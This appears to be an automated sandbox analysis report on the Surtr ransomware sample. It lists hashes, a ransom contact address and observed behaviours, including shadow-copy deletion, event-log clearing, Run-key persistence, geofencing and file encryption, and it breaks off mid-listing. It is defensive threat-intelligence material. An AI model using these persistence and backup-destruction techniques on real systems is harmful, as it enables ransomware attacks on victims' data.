Analysis
-
max time kernel
141s -
max time network
153s -
platform
windows10-2004_x64 -
resource
win10v2004-en-20220112 -
submitted
02-03-2022 08:06
Static task
static1
Behavioral task
behavioral1
Sample
Surtr.exe
Resource
win7-20220223-en
Behavioral task
behavioral2
Sample
Surtr.exe
Resource
win10v2004-en-20220112
General
-
Target
Surtr.exe
-
Size
191KB
-
MD5
664cf36657bf55f20cac44505d3bbb2c
-
SHA1
a48f8089455201895757503255d0f573ce5d3c66
-
SHA256
4a3bd45ec4a4002ff69f941678b310e2c31bc9c8dc525fe203f6ef44258b0d35
-
SHA512
42a433048ee5770244ab9f1b1165c7fd4baa87f400036a086e40020dfcfcbb4806fce55622df0cf6c64846ab7e397c1735edbe4aac2e6d153097ae6d9400f735
Malware Config
Extracted
C:\ProgramData\Service\SURTR_README.txt
Dec_youfile1986@mailfence.com
Extracted
C:\ProgramData\Service\SURTR_README.hta
Dec_youfile1986@mailfence.com
Signatures
-
Deletes NTFS Change Journal 2 TTPs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
-
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
Processes:
bcdedit.exebcdedit.exepid process 5712 bcdedit.exe 5892 bcdedit.exe -
Processes:
wbadmin.exepid process 5140 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Processes:
resource yara_rule C:\ProgramData\Service\Surtr.exe upx C:\Users\Admin\AppData\Local\Temp\Service\Surtr.exe upx C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Surtr.exe upx C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe upx -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Surtr.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\International\Geo\Nation Surtr.exe -
Drops startup file 3 IoCs
Processes:
cmd.exeattrib.exedescription ioc process File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe attrib.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe -
Adds Run key to start application 2 TTPs 8 IoCs
Processes:
reg.exereg.exereg.exereg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run reg.exe -
Drops desktop.ini file(s) 28 IoCs
Processes:
Surtr.exedescription ioc process File opened for modification C:\Users\Admin\Links\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\OneDrive\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Desktop\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Documents\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Documents\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Music\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Pictures\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini Surtr.exe File opened for modification C:\Program Files\desktop.ini Surtr.exe File opened for modification C:\Program Files (x86)\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini Surtr.exe File opened for modification C:\Users\Public\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Libraries\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Downloads\desktop.ini Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI Surtr.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Searches\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\Videos\desktop.ini Surtr.exe File opened for modification C:\Users\Public\AccountPictures\desktop.ini Surtr.exe File opened for modification C:\Users\Admin\3D Objects\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Music\desktop.ini Surtr.exe File opened for modification C:\Users\Public\Videos\desktop.ini Surtr.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
vssadmin.exeSurtr.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exedescription ioc process File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\G: Surtr.exe File opened (read-only) \??\A: Surtr.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\P: Surtr.exe File opened (read-only) \??\P: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\O: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\O: vssadmin.exe File opened (read-only) \??\Z: vssadmin.exe File opened (read-only) \??\R: Surtr.exe File opened (read-only) \??\T: Surtr.exe File opened (read-only) \??\V: Surtr.exe File opened (read-only) \??\E: Surtr.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\N: Surtr.exe File opened (read-only) \??\W: Surtr.exe File opened (read-only) \??\B: Surtr.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\K: Surtr.exe File opened (read-only) \??\G: vssadmin.exe File opened (read-only) \??\H: vssadmin.exe File opened (read-only) \??\X: vssadmin.exe File opened (read-only) \??\B: vssadmin.exe File opened (read-only) \??\O: Surtr.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\L: vssadmin.exe File opened (read-only) \??\E: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\Y: Surtr.exe File opened (read-only) \??\R: vssadmin.exe File opened (read-only) \??\S: vssadmin.exe File opened (read-only) \??\T: vssadmin.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\F: Surtr.exe File opened (read-only) \??\H: Surtr.exe File opened (read-only) \??\Q: Surtr.exe File opened (read-only) \??\V: vssadmin.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\W: vssadmin.exe File opened (read-only) \??\L: Surtr.exe File opened (read-only) \??\K: vssadmin.exe File opened (read-only) \??\J: vssadmin.exe File opened (read-only) \??\U: vssadmin.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\Y: vssadmin.exe File opened (read-only) \??\A: vssadmin.exe File opened (read-only) \??\X: Surtr.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: vssadmin.exe File opened (read-only) \??\N: vssadmin.exe File opened (read-only) \??\M: vssadmin.exe File opened (read-only) \??\M: Surtr.exe File opened (read-only) \??\U: Surtr.exe File opened (read-only) \??\I: vssadmin.exe File opened (read-only) \??\Z: Surtr.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 15 ip-api.com -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
Surtr.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000\Control Panel\Desktop\Wallpaper = "C:\\ProgramData\\Service\\SurtrBackGround.jpg" Surtr.exe -
Drops file in Program Files directory 64 IoCs
Processes:
Surtr.exedescription ioc process File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-sampler.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTrial-pl.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\themes\dark\Comb_field_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\pl-pl\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\ja-jp\ui-strings.js Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench_1.2.1.v20140901-1244.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft SQL Server\SURTR_README.txt Surtr.exe File created C:\Program Files\VideoLAN\VLC\locale\id\SURTR_README.hta Surtr.exe File created C:\Program Files\Windows Defender\es-ES\SURTR_README.hta Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\uk-ua\SURTR_README.hta Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\en-gb\SURTR_README.txt Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\js\nls\en-ae\SURTR_README.hta Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\tools\@1x\A12_Sign_White@1x.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Orange.xml Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\dc-annotations\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\lets-get-started-2x.png Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\zh-tw\SURTR_README.txt Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\fr-ma\SURTR_README.hta Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\new_icons.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.console.ui_5.5.0.165303.jar Surtr.exe File created C:\Program Files\Microsoft Office\root\Office16\ADDINS\Power Map Excel Add-in\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx Surtr.exe File created C:\Program Files\Mozilla Firefox\browser\VisualElements\SURTR_README.hta Surtr.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\SURTR_README.txt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\ru-ru\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\da-dk\SURTR_README.txt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\trash.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ul-oob.xrm-ms Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files\VideoLAN\VLC\locale\tr\SURTR_README.txt Surtr.exe File opened for modification C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Snippets\Context.snippets.ps1xml Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroApp\ENU\Viewer.aapp.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Click on 'Change' to select default PDF handler.pdf.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Legal\ENU\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Tracker\bl.gif.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\viewer\nls\hr-hr\SURTR_README.txt Surtr.exe File created C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Test\Modules\SURTR_README.hta Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\hr-hr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\cs-cz\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\tr-tr\ui-strings.js.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\reviews\js\nls\SURTR_README.hta Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\css\main-selector.css.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\WindowsPowerShell\Modules\Pester\3.4.0\LICENSE Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTrial5-ppd.xrm-ms Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019XC2RVL_KMS_ClientC2R-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_download_pdf_18.svg.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\core\dev\nls\ko-kr\SURTR_README.hta Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\images\bell_empty.png Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\js\nls\he-il\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-core-execution_ja.jar Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProO365R_SubTest-ul-oob.xrm-ms Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\OFFICE16\MSOXMLMF.DLL Surtr.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\vocaroo.luac Surtr.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\nls\he-il\SURTR_README.txt Surtr.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\aicuc\css\main.css Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.core.filesystem_1.4.100.v20140514-1614.jar Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.help.webapp.nl_ja_4.4.0.v20140623020002.jar.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-attach_zh_CN.jar Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Retail-ul-oob.xrm-ms Surtr.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_OEM_Perp2-ul-oob.xrm-ms.[Dec_youfile1986@mailfence.com].[0r6fjlh4j8u4ts].Surtr Surtr.exe File created C:\Program Files\VideoLAN\VLC\locale\de\LC_MESSAGES\PrivateData_0r6fjlh4j8u4ts.surt Surtr.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 4 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
vds.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName vds.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 vds.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName vds.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 5172 schtasks.exe 5328 schtasks.exe 5268 schtasks.exe -
Interacts with shadow copies 2 TTPs 52 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exevssadmin.exepid process 4620 vssadmin.exe 6160 vssadmin.exe 6844 vssadmin.exe 7512 vssadmin.exe 7596 vssadmin.exe 7588 vssadmin.exe 7384 vssadmin.exe 6324 vssadmin.exe 4264 vssadmin.exe 6024 vssadmin.exe 7416 vssadmin.exe 7652 vssadmin.exe 7900 vssadmin.exe 7868 vssadmin.exe 8020 vssadmin.exe 1896 vssadmin.exe 5684 vssadmin.exe 6916 vssadmin.exe 7876 vssadmin.exe 8168 vssadmin.exe 5488 vssadmin.exe 4504 vssadmin.exe 5676 vssadmin.exe 7304 vssadmin.exe 7604 vssadmin.exe 8176 vssadmin.exe 4060 vssadmin.exe 4176 vssadmin.exe 4204 vssadmin.exe 2796 vssadmin.exe 5900 vssadmin.exe 6880 vssadmin.exe 7552 vssadmin.exe 7884 vssadmin.exe 7800 vssadmin.exe 7396 vssadmin.exe 7424 vssadmin.exe 7752 vssadmin.exe 7780 vssadmin.exe 4804 vssadmin.exe 5724 vssadmin.exe 7504 vssadmin.exe 7228 vssadmin.exe 7792 vssadmin.exe 4616 vssadmin.exe 6800 vssadmin.exe 7472 vssadmin.exe 7524 vssadmin.exe 7568 vssadmin.exe 4128 vssadmin.exe 8088 vssadmin.exe 4756 vssadmin.exe -
Modifies registry class 6 IoCs
Processes:
StartMenuExperienceHost.exereg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-790714498-1549421491-1643397139-1000_Classes\Local Settings\MuiCache StartMenuExperienceHost.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.surtr reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.surtr\ = "surtr_auto_file" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\surtr_auto_file\DefaultIcon\ = "C:\\ProgramData\\Service\\SurtrIcon.ico" reg.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
Surtr.exepid process 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe 3600 Surtr.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Surtr.exepid process 3600 Surtr.exe -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
vssvc.exewbengine.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeBackupPrivilege 6952 vssvc.exe Token: SeRestorePrivilege 6952 vssvc.exe Token: SeAuditPrivilege 6952 vssvc.exe Token: SeBackupPrivilege 7288 wbengine.exe Token: SeRestorePrivilege 7288 wbengine.exe Token: SeSecurityPrivilege 7288 wbengine.exe Token: SeSecurityPrivilege 5540 wevtutil.exe Token: SeBackupPrivilege 5540 wevtutil.exe Token: SeSecurityPrivilege 7196 wevtutil.exe Token: SeBackupPrivilege 7196 wevtutil.exe Token: SeSecurityPrivilege 1904 wevtutil.exe Token: SeBackupPrivilege 1904 wevtutil.exe Token: SeSecurityPrivilege 5276 wevtutil.exe Token: SeBackupPrivilege 5276 wevtutil.exe Token: SeSecurityPrivilege 6280 wevtutil.exe Token: SeBackupPrivilege 6280 wevtutil.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
StartMenuExperienceHost.exepid process 6336 StartMenuExperienceHost.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Surtr.execmd.exedescription pid process target process PID 3600 wrote to memory of 680 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 680 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 680 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4044 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4044 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 4044 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2404 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2404 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2404 3600 Surtr.exe cmd.exe PID 2404 wrote to memory of 1840 2404 cmd.exe chcp.com PID 2404 wrote to memory of 1840 2404 cmd.exe chcp.com PID 2404 wrote to memory of 1840 2404 cmd.exe chcp.com PID 3600 wrote to memory of 1920 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1920 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1920 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3912 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3912 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2992 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2992 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1972 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1972 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1896 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1896 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3024 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3024 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2096 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 2096 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3696 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3696 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3384 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3384 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1764 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 1764 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3584 3600 Surtr.exe cmd.exe PID 3600 wrote to memory of 3584 3600 Surtr.exe cmd.exe PID 